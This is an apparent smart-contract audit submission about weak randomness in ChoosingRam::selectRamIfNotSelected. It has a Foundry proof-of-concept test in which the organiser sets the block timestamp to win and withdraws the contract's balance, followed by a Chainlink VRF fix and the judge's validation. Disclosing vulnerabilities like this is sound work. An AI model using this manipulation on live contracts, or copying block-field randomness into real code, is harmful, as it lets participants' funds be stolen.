Submission Details
Severity: low
Valid

Weak Pseudo Random Number Generation in `ChoosingRam::selectRamIfNotSelected`, the organiser can manipulate it to win

Description

The random number in `selectRamIfNotSelected` is calculated from `block.timestamp` and `block.prevrandao`, which are not as random as expected. The organiser can manipulate this function to win.

Impact

The organiser can wait for a suitable `block.timestamp` and `block.prevrandao` before calling `selectRamIfNotSelected`. The `selectedRam` will then be the organiser, who takes all the money.

Tools Used

  • Manual review

  • Slither

  • Foundry

PoC

Place this code into Dussehra.t.sol

```solidity
function test_organiserManipulateToWin() public participants {
    // A regular participant enters the event.
    vm.startPrank(player3);
    vm.deal(player3, 1 ether);
    dussehra.enterPeopleWhoLikeRam{value: 1 ether}();
    vm.stopPrank();

    // The organiser enters as well, then chooses the block timestamp before selecting.
    vm.startPrank(organiser);
    vm.deal(organiser, 1 ether);
    dussehra.enterPeopleWhoLikeRam{value: 1 ether}();
    vm.warp(1728691200 + 2);
    choosingRam.selectRamIfNotSelected();
    vm.stopPrank();

    // Index recomputed from the same block fields (not used by the assertion below).
    uint256 random = uint256(keccak256(abi.encodePacked(block.timestamp, block.prevrandao))) % ramNFT.tokenCounter();
    uint256 totalAmount = address(dussehra).balance;

    vm.startPrank(organiser);
    dussehra.killRavana();
    dussehra.withdraw();
    vm.stopPrank();

    // The organiser ends up with the contract's entire balance.
    assertEq(organiser.balance, totalAmount);
}
```

The test passes: the organiser takes all the money.

Recommendations

Do not use `block.timestamp` and `block.prevrandao` as sources of randomness. Use Chainlink VRF instead.
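One way the recommendation could look, as an added sketch that is not the project's code or the submitter's: the selection is split into a request and a coordinator callback using Chainlink VRF v2, so the caller cannot pick a block whose fields yield a preferred index. `ChoosingRamVRF`, `IRamNFT`, the state variable layout, the use of `ownerOf`, and the assumption that token ids `0..tokenCounter-1` are all minted are hypothetical; the import paths depend on the installed `@chainlink/contracts` version.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;
// Assumption: import paths match the installed @chainlink/contracts release (VRF v2).
import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/interfaces/VRFCoordinatorV2Interface.sol";
import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";

interface IRamNFT { // hypothetical minimal view of the project's NFT contract
    function tokenCounter() external view returns (uint256);
    function ownerOf(uint256 tokenId) external view returns (address);
}

contract ChoosingRamVRF is VRFConsumerBaseV2 {
    VRFCoordinatorV2Interface private immutable i_coordinator;
    IRamNFT private immutable i_ramNFT;
    address private immutable i_organiser;
    bytes32 private immutable i_keyHash; // gas lane, network specific
    uint64 private immutable i_subId;    // funded VRF subscription

    address public selectedRam;
    bool public isRamSelected;
    bool private s_requested;
    uint256 private s_requestId;
    uint256 private s_candidates; // tokenCounter snapshot taken at request time

    constructor(address coordinator, address ramNFT, bytes32 keyHash, uint64 subId) VRFConsumerBaseV2(coordinator) {
        i_coordinator = VRFCoordinatorV2Interface(coordinator);
        i_ramNFT = IRamNFT(ramNFT);
        i_organiser = msg.sender;
        i_keyHash = keyHash;
        i_subId = subId;
    }

    // The organiser only triggers the request; block fields never enter the result.
    function selectRamIfNotSelected() external {
        require(msg.sender == i_organiser, "not organiser");
        require(!s_requested, "already requested");
        s_candidates = i_ramNFT.tokenCounter();
        require(s_candidates > 0, "no participants");
        s_requested = true; // one request only, so a result cannot be re-rolled
        s_requestId = i_coordinator.requestRandomWords(i_keyHash, i_subId, 3, 100_000, 1);
    }

    // Called by the coordinator once the VRF proof verifies; avoid explicit reverts here.
    function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {
        if (requestId != s_requestId || isRamSelected) return;
        selectedRam = i_ramNFT.ownerOf(randomWords[0] % s_candidates);
        isRamSelected = true;
    }
}
```

Snapshotting `tokenCounter()` at request time keeps entries made between the request and the callback from changing the modulus.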

Updates

Lead Judging Commences

bube Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

Weak randomness in `ChoosingRam::selectRamIfNotSelected`

The organizer is trusted, but the function `ChoosingRam::selectRamIfNotSelected` uses a way to generate a random number that is not completely random.
